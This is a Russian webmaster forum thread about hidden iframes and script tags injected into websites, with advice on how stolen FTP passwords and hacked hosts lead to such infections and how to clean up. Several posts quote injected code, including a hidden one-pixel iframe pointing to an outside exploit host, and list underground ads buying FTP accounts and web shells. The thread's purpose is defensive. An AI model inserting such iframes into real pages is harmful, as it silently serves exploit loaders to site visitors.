Перейти к публикации

Для счастливчиков, кто на у себя на сайте находит трояна и ifram`ы


Рекомендованные сообщения

Народу становится все больше, тех кто понимает чтото в php и вообще сети (с точки зрения матчасти) все меньше. Вероятно тут есть обратная зависимость =\

Итак. если Вы нашли на своем сайте код типа

<iframe src=http://***/***/ex.php border=0 width=1 height=1></iframe>
или
<script src=http://***/load.js></script>
(иногда такой код просто зашифрован яваскриптами - для невозможности прочтения) мои поздравления. с Вашего сайта либо гонится РУ трафик, либо используется для распространения какого-нить лоадера (который в дальнейшем загружается на зараженную машину другие трояны, начиная от пинча, и до ддос троев) Итак откуда у вас такое счастье. Если Вы подумали что ктото ваш сайт взломал - забудьте, на НАХ никому не дались. если будут ломать конкретно Вас - просто повесят дефейс. Им же нужно показать - что Вас поимели. Тогда возникает вопрос - откуда. Ну если не считать упорных слухов что есть приватные сплоиты для DLE верси(и/й) ?.? (я лично ниодин из них не видел ни у кого из знакомых) то можно сказать что кто-то получил доступ к Вашему ftp. это можно осуществить двумя путями. 1) вы заражены - все ваши пароли у злоумышлинников (например трой pinch3 - гугль рулит) - как вы заразились.... 1.1) открыли "фотку" девушки из icq 1.2) глянули флеш ролик с приклеенным троем 1.3) зашли на страницу как у вас, которая содержит експлоит (опять же гугль подскажет) 2) наиболее правдивый вариант - поимели не Вас, а вашего хостера, и как сделствие еще и все остальные сайты которые он поддерживает (т.е. в этом теплом и темном месте не вы одни, а с целой компанией) сушествуют скрипты, которым необходимо подсунуть список
ftp:pass

ftp:pass

ftp:pass

ftp:pass

и они АВТОМАТОМ прописывают во все index.php/index.html и прочие файлы по умолчанию заданный текст. обыно это наш любимый ифрейм с адресом ведущим на сплоит =)

есть куча людей, которые просто с удовольствием покупают такие списки (ну плюс желательно чтобы был хороший индекс и пиар) по несколько тысяч ftp

например вот вам заголовки

>Покупаю фтп в больших количествах

>Покупаю ФТП с PR>4, веб-шеллы, руты

>Покупаю ФТП (edu, gov, com pr5)

>FTP Toolz pack - скрипт для работы с ftp-акками

>КУПЛЮ ДОРОГО: roots, ftps, shells, webshells

>Куплю FTP, вебшеллы. PR >=3

>Куплю веб-шелы и FTP в любых зонах, любой PR

>~ нужны ФТП(и ШЕЛЛЫ!) .EDU ~

>Возьму Фтп, вэб-шеллы

>Скупаю ftp/shells/traff/bd

>EDU 60-150$ беру. И обычные домены приветствуются.

>покупаю FTP и вебшеллы к доменам в зонах .edu .gov

и это только один форум! =)

ИТОГО.

1) проверьтесь антивирусниками

2) удалите мусор в виде фреймов

3) смените пароли

4) скажите хостеру, что у него проблемы

5) поменяйте браузер с IE6

просьба не флеймить, а задавать конкретыне вопросы по сабжу - постараюсь ответить

Ссылка на сообщение
Поделиться на других сайтах

а где в DLE могут сидеть эти фреймы?

я обнаружил один в index файле но когда я его отуда убираю

у меня эксплоер выдаёт ошибку((

типа страница загружена с ошибками

да и с фреймом сайт работает ка кни вчём не бывало

открыл архвные фалы старых проинсталеных версий DLE там в индекс файле тоже это <iframe src='http://strumpf1.com/yabb/Sources/' width='1' height='1' style='visibility: hidden;'></iframe>

откуда оно взялось :(

Изменено пользователем гиперон
Ссылка на сообщение
Поделиться на других сайтах

Антивирус встроенный в DLE этот эксплоит ловит?

ловит в 5.5. если вы предварительно до этого сделаете снимок системы

Ссылка на сообщение
Поделиться на других сайтах

Спасибо за статью, но для меня это уже пройденный этап :) Такая история была со мной, когда я ещё сидел на IE6, но даже NOD32 с последними базами не смог защитить от пинча... вот так..

xsash, если не трудно, будь добр расскажи как защититься от пинча.. Ведь он обходит практически все антивирусники и фаеры...

Ссылка на сообщение
Поделиться на других сайтах

но даже NOD32

Помоему лутше Капреа ничего нет.

А то что хостеров опускают это факт.

Сейчас на многие хостеры идет дос атака.

Ссылка на сообщение
Поделиться на других сайтах

zuven, Что кассается антивирусника, Каспер (ихмо) великий тормоз всего, он приколый для сисадминов в офисе, но не для дома... В 5.5 версии DLE делайте снимок в антивирусе, а потом проверяйте. По сути, в записях iframe, виноваты хостеры (не грамотная настройка сервера и принебрежение безопасности - а может не знание). А если хостинг majordomo.ru, то я бы переехал (собственно, что и сделал годик назад), так же как и с агавы, админы серверов там не компитентны вообще, их ломали/заражали, так и будут (пока грамотных не наберут, для обслуживания серверов). Что бы не ловить всё это, надо на нормальных хостах сайты ставить... :rolleyes:

Ссылка на сообщение
Поделиться на других сайтах

Каспер грузит сильно компьютер, но к счастью мне это незаметно.

Был такой вроде как анекдот:

Устроили тестирование антивируса Касперского и NOD32.

Запустили в компьютер вирус.

NOD32 ни один не пропустил.

Установили Каспера, запустили вирусы.

Так же ни одного не пропустил.

Но не из-за того, что качественный антивирус,

а из-за того, что вся процессорная память была занята Касперским

и вирус не мог запустится :)

И всё таки Каспера я предпочитаю

Ссылка на сообщение
Поделиться на других сайтах

Snow Land,

тож предпочитаю каспера, но не всегда его запускаю. Работать параллельно с прогами, требующими много памяти - невозможно. Ладно, это оф.

Хотел спросить Stude_nt: скажите плиз: использую хостинг infobox.ru, пока не встречался с подобными проблемами, но всё равно как считаете - можно этой компании доверять? или не сталкивались?

Ссылка на сообщение
Поделиться на других сайтах

EVRIAL

да никак. просто банальные правила.

патченная система, патченные проги, браузер НЕ IE? не открывать левые ссылки.

у меня вот антивируса и нет подавно.... только фаер рекламу режет... и ничего, живой

zuven

дос причем тут? ну вот скажи, кому хостер чейто дался? другое дело чейто проект убивают, это нормально, поэтому и хостер прогибается

Изменено пользователем xsash
Ссылка на сообщение
Поделиться на других сайтах

Во дела, так тут у всех всё пропатченое :huh:

И нах я и Windows XP / Vista покупал, и антивирусы :huh:

Кстати, кто сталкивался с программой Trust Cleaner :angry:

Ссылка на сообщение
Поделиться на других сайтах

не, бывает мозги не пропатчены =\

я сам раза 2 просто _случайно_ открывал левые ссылки и запускал файлы. обычно заработаешься над проектом, а тут те ссылка от друга... а то что он мне ссылко никогда не дает доходит после минуты... а его протроянили... ну и начинается чистака компа, смена паролей...

ну никто от этого не застрахован

Ссылка на сообщение
Поделиться на других сайтах

Snow Land

человек который РЕАЛЬНО занимается троянами, НИКОГДА не будет использовать вирусы, которые палятся.

в тя пинчем чтоли кинуться чистяком? =)

или на связку сплоитов пустить по ссылке, которая чтоже не определится ничем?

не нужно забывать еще кучу приватных бонусов которые ТОЖЕ "облегчают жизнь"

Ссылка на сообщение
Поделиться на других сайтах

Ну может тогда рассмотрим что такое вирус?

Это порядок определённых байт, или как это называется "сигнатуры".

Вирус должен содержать именно определённый порядок и никак иначе.

Это не программа блокнот или тот же фотошоп, который содержит транслитериpoванный машинный код, а просто цифровой порядок и ничего более.

Видел HEX редакторы?

Вот, это и есть сигнатуры, из которых состоят так называемые вредоносные коды.

Нарушения этого порядка приведёт просто к деструкции.

Стоит почитать некоторые книги, которые остались в библиотеках, времён IBM ...

Так что понятие вирус не такое буквальное, как ты написал выше постом.

Ссылка на сообщение
Поделиться на других сайтах

Al-x, об этом хосте не слышал ни чего плохого...

Snow Land, я не сталкивался с Trust Cleaner, но на мой взгляд, это всё параноя... Подобных программ куча: Antiy GhostBusters Pro, Anti-keylogger, McAfee AntiSpyware Enterprise Standalone и для совсем параноиков Safe’n’Sec Personal (программа жесть, в купе с антивирусом (только не с Каспером) и Agnitum Outpost Firewall PRO) вообще не пробиваемая стена, парой даже админу не реально завершить или запустить некоторые скрытые процессы :lol:

Ссылка на сообщение
Поделиться на других сайтах

Stude_nt, вот был у меня этот Trust Cleaner.

Почитай, что это такое (привожу конкретные ссылки):

http://www.softboard.ru/lofiversion/index.php/t38431.html

http://virusinfo.info/showthread.php?t=6017

Ссылка на сообщение
Поделиться на других сайтах

Почитал... К сведению принял... собственно, я не устанавливаю левых прог, период тестирования компа закончился у меня пару лет назад... теперь только проверенное ПО ставлю... в общем, познавательно почитать тем, кто любит поэксперементировать :) , а в итоге ифреймы...

Изменено пользователем Stude_nt
Ссылка на сообщение
Поделиться на других сайтах

Хотел спросить Stude_nt: скажите плиз: использую хостинг infobox.ru, пока не встречался с подобными проблемами, но всё равно как считаете - можно этой компании доверять? или не сталкивались?

тоже им пользуюсь, но не доверяю уже, не радует он меня(( постоянно у них какие-то проблемы с сервами

как-то движёк от этого накрылся(( едиснственно скорость у них хорошая

следующим этапом буду брать mchost.ru

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...